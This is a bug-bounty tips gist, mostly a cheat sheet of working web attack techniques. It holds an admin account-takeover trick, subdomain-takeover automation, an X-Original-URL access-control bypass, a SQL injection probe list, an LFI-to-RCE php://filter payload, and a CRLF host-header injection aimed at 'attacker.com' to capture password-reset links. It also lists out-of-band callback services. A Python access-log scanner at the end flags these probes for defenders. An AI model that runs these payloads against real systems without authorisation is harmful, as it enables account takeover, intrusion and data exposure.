Gist BugHunter001/f77f87ec10102df3f5d2fdf8bc5a8614, last active August 22, 2024 08:49
site.com/file.php
response = nothing
http://site.com/file.php~
response = source
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
try to add admin as your user,
change his email to yours,
request a password reset.
now, you are admin :)
this won't happen you think? It is, I did it ;)
you are not adding your email as the admin email, you are adding the admin's email to your app, changing his email to yours, then requesting a password change. The admin's password reset link comes to you
-----------------------------------------------
subfinder -dL domains.txt -o subdomains.txt && subjack -w subdomains.txt | toslack
recommended to use in a VM
(subdomain takeover automation)
-------------------------------------------------------------------------------
Easy information disclosure:-
cat hosts.txt | httpx -path //server-status?full=true -status-code -content-length
cat hosts.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length
--------------------------------------------------------------------------------
Use the following dork and try directory brute forcing if your target allows it. This will look for things you are not supposed to access that sit behind a login page.
inurl:login | inurl:signin | intitle:Login | intitle:"sign in" | inurl:auth
--------------------------------------------------------------------------------
Information disclosure:-
1. subfinder -d target.com | httprobe -c 100 > target.txt got around 210 subdomains.
2. cat target.txt | aquatone -out ~/aquatone/target
3. Checked every screenshot and found an interesting subdomain.
4. Tried for some low-hanging bugs (XSS, open redirect etc.) but nothing worked :(
5. Then I decided to brute force the directories; I used ffuf and one of the wordlists from @DanielMiessler's SecLists.
6. ffuf -w path/to/wordlist.txt -u https://sub.target.com/FUZZ -mc all -c -v
7. And after some time got an endpoint which was exposing /debug/pprof, which had a lot of sensitive info such as debug info, traces etc. ;)
8. Reported the issue to the company and they quickly fixed it and acknowledged my work :) Reference:- http://link.medium.com/mym9UTLHQ9 and a great ffuf guide by @codingo_ https://youtu.be/iLFkxAmwXF0
--------------------------------------------------------------------------------
Useful services for out-of-band exploitation.
1. Burp Collaborator
2. https://webhook.site
3. https://requestcatcher.com
4. https://canarytokens.org/generate
5. http://dnsbin.zhack.ca
6. https://ngrok.com
-------------------------------------------------------------------
Google dorks for hunting
https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06
-------------------------------------------------------------------
crt.sh one-liner
curl -s https://crt.sh/\?q\=\%.target.com\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
-------------------------------------------------------------------
JSScanner
https://github.com/dark-warlord14/JSScanner
----------------------------------------------------------------
https://www.notion.so/Subdomain-Enumaration-5109690b9db14b41b02b373af8234c93
subdomain enum full
-----------------------------------------------------------------
https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/ (full info)
----------------------------------------------------------------------
GET /admin HTTP/1.1
Host: site.com
...
Access is denied
GET /test HTTP/1.1
Host: site.com
X-Original-URL: /admin
HTTP/1.1 200 OK
---------------------------------------------------------------------------
Looking for IDORs? Check this:-
1. Keep an eye on every endpoint and what data is passing through it.
2. If you create an account on the main domain, try to find subdomains with login functionality.
3. Use Burp's search functionality a lot for keywords :)
4. If sequential numbers are not working, try your UserId parameter along with the victim's id in the request.
5. Once you upload images, keep an eye on whether they generate a unique ID!
-------------------------------------------------------------------------
Tip: use confirm instead of alert ;) alert is probably the most filtered word out there in XSS payloads
------------------------------------------------------------------------
Always check the target-name directory on the domain, like http://site.com/site/ or http://target.com/target/.
Got the same thing on 2 subdomains of a target.
1st was leaking staff PII: got a 3-digit bounty.
---------------------------------------------------------------------------------
2FA bypassing for bug bounties
1. Background concept about 2FA bypass
- With the rise of account takeovers, companies like Google and Facebook have implemented this feature on various sensitive pages where an attacker could otherwise get or modify a user's data without their consent. This authentication method improves the security posture and provides secure access for users. Using two-factor authentication prevents hackers or attackers from compromising your account even if your account credentials are leaked publicly or bypassed.
2. Impact of 2FA bypass
- ticket system takeover, unauthorized email verification bypass, account
3. Types of 2FA bypass: request and response manipulation.
- For this you need familiarity with Burp Suite and a bit of a logical mindset
4. Security misconfiguration
Session hijacking, subdomain-to-domain bypass, missing and broken links, input validation
----------------------------------------------------------------------------------------
~Dorker
https://dorks.faisalahmed.me
----------------------------------------------------------------------------------------
curl "https://certspotter.com/api/v0/certs?domain=$1" | grep -o '\[\".*\"\]'
curl http://index.commoncrawl.org/CC-MAIN-2018-22-index\?url\=\*.hackerone.com\&output\=json | jq .url
curl 'http://web.archive.org/cdx/search/cdx?url=*.cardpay.ntc.net.np/*&output=text&fl=original&collapse=urlkey'
-----------------------------------------------------------------------------------------
1. Create an account email@burp_collab*
2. Forgot password
3. Received requests from the internal server + SMTP connection details
4. Got internal headers + origin IP
5. http://site.com/admin = (403)
6. http://site.com/admin = (headers + origin IP = pwn)
---------------------------------------------------------------------------------------------------
Looking for Jira subdomains of your targets?
Use these kinds of dorks.
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
site:*.target.com filetype:jspa
-----------------------------------------------------------------
Bug Bounty Tips
This is how to find SQL injection 100% of the time
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=1-sleep()
/?q=1 and sleep()
/?q=")
/?q=')
/?q=-x()
----------------------------------------------------------------------------------
LFI to RCE
Uploaded shell.php
Page=php://filter/convert.base64-encode/resource=shell.php
---------------------------------------------------------------------------------
wordlist for all fuzzing
https://wordlists.assetnote.io/
https://s3.amazonaws.com/assetnote-wordlists/data/automated/$filename.txt (download)
---------------------------------------------------------------------------------
Host header based CRLF injection
POST /resetPassword%0D%0AHost:http://attacker.com
Host: test.com
[...]
[email protected]
-------------------------------------------------------------------------------
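Defender-side counterpart to the probes above (the `~` backup-file trick, /server-status, /web-console/, /debug/pprof, the SQL-injection and php://filter parameters, and the CRLF-in-path request). This is an added example, not part of the gist: it tags access-log lines that match those patterns so they can be triaged. The log lines, IPs and hostnames are constructed; the tag names and rule set are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [22/Aug/2024:08:49:01 +0000] "GET /file.php~ HTTP/1.1" 200 1832 "-" "curl/8.4.0"
203.0.113.5 - - [22/Aug/2024:08:49:02 +0000] "GET /server-status?full=true HTTP/1.1" 403 199 "-" "curl/8.4.0"
203.0.113.5 - - [22/Aug/2024:08:49:03 +0000] "GET /debug/pprof/goroutine?debug=2 HTTP/1.1" 200 9120 "-" "curl/8.4.0"
198.51.100.7 - - [22/Aug/2024:08:50:10 +0000] "GET /search?q=1'%20or%20'1'='1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Aug/2024:08:50:11 +0000] "POST /resetPassword%0D%0AHost:attacker.example HTTP/1.1" 400 0 "-" "Mozilla/5.0"
198.51.100.7 - - [22/Aug/2024:08:50:12 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
192.0.2.9 - - [22/Aug/2024:08:51:00 +0000] "GET /about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Path-level rules: the request-line patterns the tips above rely on.
PATH_RULES = [
    ("backup-file-probe", re.compile(r"~$")),                       # /file.php~ leaking source
    ("server-status", re.compile(r"^/server-status$", re.I)),       # Apache mod_status
    ("web-console", re.compile(r"^/web-console/", re.I)),           # JBoss console
    ("pprof-exposure", re.compile(r"^/debug/pprof(?:/|$)", re.I)),  # Go profiler endpoints
]
# Query-level rules, applied after one round of percent-decoding.
QUERY_RULES = [
    ("php-filter-wrapper", re.compile(r"php://filter", re.I)),
    ("sqli-probe", re.compile(r"['\"`\\]|\bsleep\s*\(|/\*!?\d*'", re.I)),
]

def classify(target):
    """Return the indicator tags matching one request target (path + query)."""
    decoded = unquote(target)  # single decode; double-encoded probes need a second pass
    hits = []
    if "\r" in decoded or "\n" in decoded:  # check before splitting: urlsplit() drops \r\n
        hits.append("crlf-injection")
    path, _, query = decoded.partition("?")
    hits += [name for name, rx in PATH_RULES if rx.search(path)]
    hits += [name for name, rx in QUERY_RULES if rx.search(query)]
    return hits

def scan(log_text):
    """Parse combined-log lines; return one finding per line that matched a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := classify(m["target"])):
            # A 200 on a disclosure path is a confirmed exposure, not just a probe.
            findings.append({"ip": m["ip"], "target": m["target"], "status": int(m["status"]),
                             "tags": tags, "confirmed": m["status"] == "200"})
    return findings
```

The sqli-probe rule is a triage heuristic and will flag legitimate apostrophes in search terms; pair it with the status code and the source address before acting on it.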